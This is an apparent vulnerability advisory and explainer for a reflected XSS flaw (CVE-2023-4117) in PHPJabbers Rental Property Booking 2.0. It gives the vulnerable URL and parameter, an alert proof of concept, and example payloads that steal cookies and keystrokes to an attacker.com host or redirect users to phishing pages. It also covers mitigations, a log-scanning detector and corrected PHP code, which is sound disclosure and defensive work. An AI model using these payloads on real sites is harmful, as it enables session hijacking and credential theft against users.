PHPJabbers Rental Property Booking 2.0 - Reflected XSS
# Exploit Title: PHPJabbers Rental Property Booking 2.0 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 22/07/2023
# Vendor: PHPJabbers
# Vendor Homepage: https://www.phpjabbers.com/
# Software Link: https://www.phpjabbers.com/rental-property-booking-calendar/
# Version: 2.0
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
# CVE: CVE-2023-4117
## Greetings
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob
## Description
An attacker can send the victim a link containing a malicious URL in an email or instant message and can then perform a wide variety of actions, such as stealing the victim's session token or login credentials.
Path: /index.php
GET parameter 'index' is vulnerable to RXSS
https://website/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=[XSS]&date=
[-] Done PHPJabbers Rental Property Booking 2.0: Reflected XSS Vulnerability Exploited
Security researchers have identified a critical reflected XSS (Cross-Site Scripting) vulnerability in PHPJabbers’ Rental Property Booking 2.0 application, assigned CVE-2023-4117. This flaw enables attackers to inject malicious scripts into web pages via manipulated URLs, potentially compromising user sessions and stealing sensitive data.
Understanding Reflected XSS
Reflected XSS occurs when user input is directly embedded into a web page without proper sanitization. Unlike stored XSS, which persists in the database, reflected XSS is triggered by a single request—typically through a malicious link sent via email, chat, or social media.
When a victim clicks on a crafted URL, the malicious script executes in their browser, exploiting the trust they have in the domain. This makes reflected XSS particularly dangerous in social engineering scenarios.
Attack Vector: The index Parameter in index.php
The vulnerability resides in the index.php file, specifically in the index GET parameter. This parameter is used to control navigation within the application’s frontend interface.
https://website/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=[XSS]&date=
Here, the index parameter is directly echoed back in the response without filtering or escaping. An attacker can replace [XSS] with malicious JavaScript code to trigger execution.
Real-World Exploit Example
Consider the following malicious URL:
https://example.com/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=<script>alert('XSS');</script>&date=
When a user visits this link, the browser renders the script, triggering an alert popup. While this example is benign, it demonstrates how easily malicious code can be injected.
More dangerous payloads could include:
- Stealing session cookies: `<script>document.location='https://attacker.com/steal?c='+document.cookie;</script>`
- Redirecting users to phishing sites: `<script>window.location='https://fake-login.com';</script>`
- Injecting keyloggers: `<script>document.addEventListener('keydown', function(e) { fetch('https://attacker.com/log?key='+e.key); });</script>`
Impact and Risks
Due to the reflected nature of the vulnerability, the impact is immediate and user-specific:
| Attack Type | Impact | Attack Vector |
|---|---|---|
| Session Hijacking | Unauthorized access to user accounts | Malicious URL via email or chat |
| Phishing | Deceptive login pages leading to credential theft | Redirects via XSS payload |
| Malware Delivery | Execution of client-side exploits | Script injection through URL |
Attackers can leverage this flaw to craft convincing phishing links, especially when targeting users who trust the domain (e.g., property booking sites). The lack of input validation in index makes it a prime target for exploitation.
Root Cause Analysis
The vulnerability stems from improper handling of user-supplied input in the application’s frontend routing logic. Specifically:
- Input is not sanitized before being displayed.
- No output encoding (e.g., HTML entity escaping) is applied.
- Security checks are absent for sensitive parameters like `index`.
PHPJabbers’ codebase appears to rely on basic routing without implementing security best practices—common in open-source projects with minimal security audits.
Recommendations and Mitigation
Developers and administrators must take immediate action to prevent exploitation:
- Sanitize all user inputs: Use functions like `htmlspecialchars()` in PHP to escape special characters.
- Validate parameter values: Restrict `index` to predefined, safe options (e.g., `search`, `book`, `calendar`).
- Implement Content Security Policy (CSP): Add headers like `Content-Security-Policy: default-src 'self';` to block inline scripts.
- Use secure session management: Avoid exposing session IDs in URLs; use cookies instead.
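Administrators who cannot patch immediately can at least see whether the `index` parameter on their installation is being probed. The following is an added log-triage example (not from the advisory or from PHPJabbers) that decodes the `index` value from access-log requests to `index.php` and flags anything outside an assumed allowlist or carrying markup; the allowlist, the combined-log regex and the sample log lines are constructed for this example, and the second decode pass shows why a single URL-decode is not enough.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Hypothetical allowlist of legitimate `index` navigation keywords; the advisory
# does not list the application's real set, so adapt this per installation.
ALLOWED_INDEX = {"search", "book", "calendar", "profile"}

# Tokens a navigation keyword never legitimately contains.
SUSPICIOUS = re.compile(r"""[<>"']|javascript:|on\w+\s*=|&#""", re.IGNORECASE)

# Combined log format: client identd user [timestamp] "METHOD target PROTO" status ...
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<target>\S+) \S+" (?P<status>\d{3})')

# Constructed sample lines (not real traffic): a benign search, the advisory's PoC
# payload URL-encoded, the same payload double-encoded, an unknown keyword, a static file.
BASE = "/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index="
SAMPLE_LOG = [
    f'203.0.113.10 - - [22/Jul/2023:10:01:02 +0000] "GET {BASE}search&date= HTTP/1.1" 200 5120',
    f'203.0.113.10 - - [22/Jul/2023:10:01:09 +0000] "GET {BASE}%3Cscript%3Ealert(\'XSS\')%3B%3C%2Fscript%3E&date= HTTP/1.1" 200 5211',
    f'198.51.100.7 - - [22/Jul/2023:10:02:30 +0000] "GET {BASE}%253Cscript%253Ealert(1)%253C%252Fscript%253E&date= HTTP/1.1" 200 5198',
    f'198.51.100.7 - - [22/Jul/2023:10:03:00 +0000] "GET {BASE}sitemap&date= HTTP/1.1" 200 4990',
    '192.0.2.5 - - [22/Jul/2023:10:04:00 +0000] "GET /css/style.css HTTP/1.1" 200 1200',
]

def check_request(target):
    """Return (reason, decoded index value) when `index` looks hostile or unknown, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/index.php"):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)  # decodes one layer of %XX
    for raw in qs.get("index", []):
        value = unquote(raw)  # second pass exposes double-encoded payloads
        if SUSPICIOUS.search(value):
            return ("xss_markers", value)
        if value and value not in ALLOWED_INDEX:
            return ("unknown_index", value)
    return None

def scan_log(lines):
    """Apply check_request to each access-log line; return one finding dict per hit."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        hit = check_request(m["target"]) if m else None
        if hit:
            findings.append({"ip": m["ip"], "ts": m["ts"], "status": m["status"],
                             "reason": hit[0], "index": hit[1]})
    return findings
```

A 200 status on a flagged request tells the defender the payload was reflected, not merely attempted, which is the signal worth alerting on while the fix is pending.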
Corrected Code Example
Here’s how to properly handle the index parameter in PHP:
```php
<?php
// Define the allowed navigation targets for the `index` parameter.
$allowed_indices = ['search', 'book', 'calendar', 'profile'];

// Retrieve the input; $_GET values can also be arrays (index[]=...), so only accept strings.
$index = $_GET['index'] ?? '';
if (!is_string($index)) {
    $index = '';
}

// Validate against the allowlist (strict comparison) and escape for HTML output.
if (in_array($index, $allowed_indices, true)) {
    $safe_index = htmlspecialchars($index, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
} else {
    $safe_index = 'search'; // fall back to a known-safe default
}

// Use the escaped value in output.
echo '<div>Current page: ' . $safe_index . '</div>';
?>
```
This code ensures that only predefined, safe values are processed and rendered, preventing script injection.
Conclusion
The CVE-2023-4117 vulnerability in PHPJabbers Rental Property Booking 2.0 highlights the importance of input validation and output encoding in web applications. Even seemingly harmless parameters like index can become attack vectors if not properly secured.
As developers, we must prioritize security from the start—using defensive coding practices, regular audits, and proactive patching. Users should avoid clicking on suspicious links, especially from unknown sources, and ensure their software is updated to the latest version.
Security is not optional—it’s essential.